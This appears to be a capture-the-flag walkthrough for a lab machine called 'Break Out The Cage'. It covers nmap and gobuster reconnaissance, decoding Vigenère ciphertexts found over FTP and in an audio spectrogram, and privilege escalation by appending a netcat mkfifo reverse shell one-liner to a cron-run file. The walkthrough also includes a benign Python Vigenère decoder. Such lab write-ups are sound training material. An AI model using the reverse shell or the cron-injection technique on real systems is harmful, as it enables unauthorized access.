# Break Out The Cage

![](/files/-Mc_gO-d_U-NjDklPL15)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**):

```
nmap -Pn 10.10.96.253
```

![](/files/-Mc_go0lKUWN1_HtivwB)

Detailed Nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: default nmap scripts
* **-p**: specify ports 21, 22 and 80
* **-oN nmap**: save the output into a file called `nmap`

```
nmap -sV -sC -p 21,22,80 -oN nmap 10.10.96.253
```

![](/files/-Mc_gvBB95Ee5LtYU1Zz)

## Enumeration

### Port 21: FTP

Anonymous login is allowed, so let's check it out and download the files on the server.

![](/files/-Mc_hZwWRw_Ng05qhNPs)

Let's read the file.

![](/files/-Mc_hh8C7jG5H4WCH23T)

It looks like it's encrypted, so let's decode it using [CyberChef](https://gchq.github.io/CyberChef/).

![](/files/-Mc_i6K92LJk-gwj_gEh)

It looks like it has been encrypted twice, so let's find out what this second layer says too.

![](/files/-Mc_q90nkF1eilFMy1Pj)

This looks like a password. We could try it against SSH, but let's first check port 80 (HTTP).

### Port 80: HTTP

![](/files/-Mc_j-SWvbIZYGReGm9T)

Looking at the page, we have a username: `Weston`. None of the links on the page work, so let's run `gobuster` to find hidden directories.

```
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.96.253/
```

![](/files/-Mc_oJEGTRk4sGsthu5J)

There is nothing of interest in `/scripts`, and the `/contracts` directory only has an empty file. The `/auditions` directory has an interesting file.

![](/files/-Mc_oZE0o5jB_1pB8pJt)

Let's download this to our machine.

![](/files/-Mc_oojra9yRu-OH31rQ)

We can look at this file with a tool called Sonic Visualiser, so let's open the file in the app.

![](/files/-Mc_rHT97PfA7wOdrkb2)

Now go to the Pane menu, select `Add Spectrogram` and click the first option. We add a spectrogram so that we can look for data hidden in the audio.

![](/files/-Mc_szmkDlXt46_MtHLM)

We can see a box; let's see what it says.

![](/files/-Mc_tBgQPnMbmPAeGn-x)

After changing the colour scheme to get a better view, we can see that it says `namelesstwo`. Checking around, I found out that this is the key for the Vigenère cipher that we can use to decrypt the text we found before.

![](/files/-Mc_tgYitDjQ2182oO6J)

We get the same text we found before. Let's log in through SSH now with the username we found at the start, `Weston`.

![](/files/-Mc_u3tEkpnR9qhvLJJ3)

As the password worked, we can answer the first question.

![](/files/-Mc_uI3mJ_U7TYCgp0I3)

## Privilege Escalation

I was looking around when a message popped up.

![](/files/-Mc_uX1AM4alDafOGiHA)

It looks like there is a cron job running that executes this script every few minutes, so let's go find it. I was searching for a while and could not find it, so let's transfer a tool called [pspy](https://github.com/DominicBreuker/pspy) onto this machine and have it find the cron job for us.

To transfer this file, let's start an HTTP server on our machine and download the file on the victim machine with `wget`. If you have just downloaded pspy, make sure to make it executable.

![](/files/-Mc_w_G0SjXhQnwC8WNE)

Now let's start an HTTP server.

![](/files/-Mc_wghdmITesU98GTJr)

Now let's download the file on the victim's machine.

![](/files/-Mc_wtlhO4cP5ogdOxvZ)

Let's make the file executable.

![](/files/-Mc_x-C7XwKkkh6miW0t)

Now run the file.

![](/files/-Mc_x9g3kxDVn1dN95yl)

Looking through the output, we find an interesting file which may be the one we are looking for.

![](/files/-Mc_xWS0xe7yX36wlPIe)

Let's check this file.

![](/files/-Mc_xdkp1Jur2cc-OdRM)

Let's add a reverse shell to the `.quotes` file (since the `.quotes` file is being printed every few minutes) so that we can get access as a higher-privileged user, namely the owner of the file `./opt/.dads_scripts/.files/.quotes`, **`cage`**. We can see this when we look at the permissions of the file.

![](/files/-Mc_yrcQvbKbnK47zA0L)

The reverse shell we will be using is this:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
```

Let's echo the reverse shell into the file and start a netcat listener.

![](/files/-McaEbr6REtLaFndrpJF)

![](/files/-Mc_z7xqSIh8BybaOEyX)

After a while, you should get a reverse shell.

![](/files/-Mca-dAeY1NvYey3HWFR)

Let's stabilize the shell.

![](/files/-Mca-tDIAZqCZ1-R7_Aa)

Let's read the file in this directory.

![](/files/-Mca0Bm_n_Myk6E-HlQW)

We have the user flag.

Next, let's `cd` into the email backup folder and read all the files.

![](/files/-McaBbvMVj4Gp4fSlbqX)

Looking through the files, the only interesting things I found are the string in the third email and the number of times the word `FACE` is used. This might be something that will help us, so let's copy the string and try to decrypt it using CyberChef.

![](/files/-McaCAaCRJ1l3047v3Pl)

So `FACE` was indeed the key to decrypt this string, and the result is the password for the root account. Let's switch users and read the root flag.

![](/files/-McaDtCHgjf1XvW7Xlpd)
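As an added example that is not part of the original writeup, the Vigenère step used twice above (key `namelesstwo` for the audition string, key `FACE` for the email string) done in Python instead of CyberChef, so a captured string can be decoded offline. The ciphertexts in the block are constructed for the example; the real ones only appear in the screenshots.

```python
# Added example: Vigenere encode/decode matching the CyberChef recipe used
# in this writeup. Non-letters pass through unchanged and do not consume a
# key letter, so a decoded result lines up with what CyberChef shows.
import string

ALPHABET = string.ascii_lowercase


def vigenere(text: str, key: str, decrypt: bool = False) -> str:
    """Shift each letter of `text` by the matching key letter.

    Case is preserved; the key is normalised to lowercase letters only.
    """
    key = "".join(c for c in key.lower() if c in ALPHABET)
    if not key:
        raise ValueError("key must contain at least one letter")
    out = []
    k = 0  # index into the key; only advances on letters
    for ch in text:
        lower = ch.lower()
        if lower not in ALPHABET:
            out.append(ch)
            continue
        shift = ALPHABET.index(key[k % len(key)])
        if decrypt:
            shift = -shift
        new = ALPHABET[(ALPHABET.index(lower) + shift) % 26]
        out.append(new.upper() if ch.isupper() else new)
        k += 1
    return "".join(out)


def decode_candidates(ciphertext: str, keys: list[str]) -> dict[str, str]:
    """Try every recovered key against one string; returns key -> plaintext."""
    return {key: vigenere(ciphertext, key, decrypt=True) for key in keys}


if __name__ == "__main__":
    # Constructed sample strings (not the box's real data), round-tripped
    # with the two keys recovered in the writeup.
    for key, sample in (("namelesstwo", "constructed sample text"),
                        ("FACE", "Another Constructed String")):
        ct = vigenere(sample, key)
        print(f"key={key!r:14} ciphertext={ct!r}")
        print(f"{'':18} recovered={vigenere(ct, key, decrypt=True)!r}")
```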
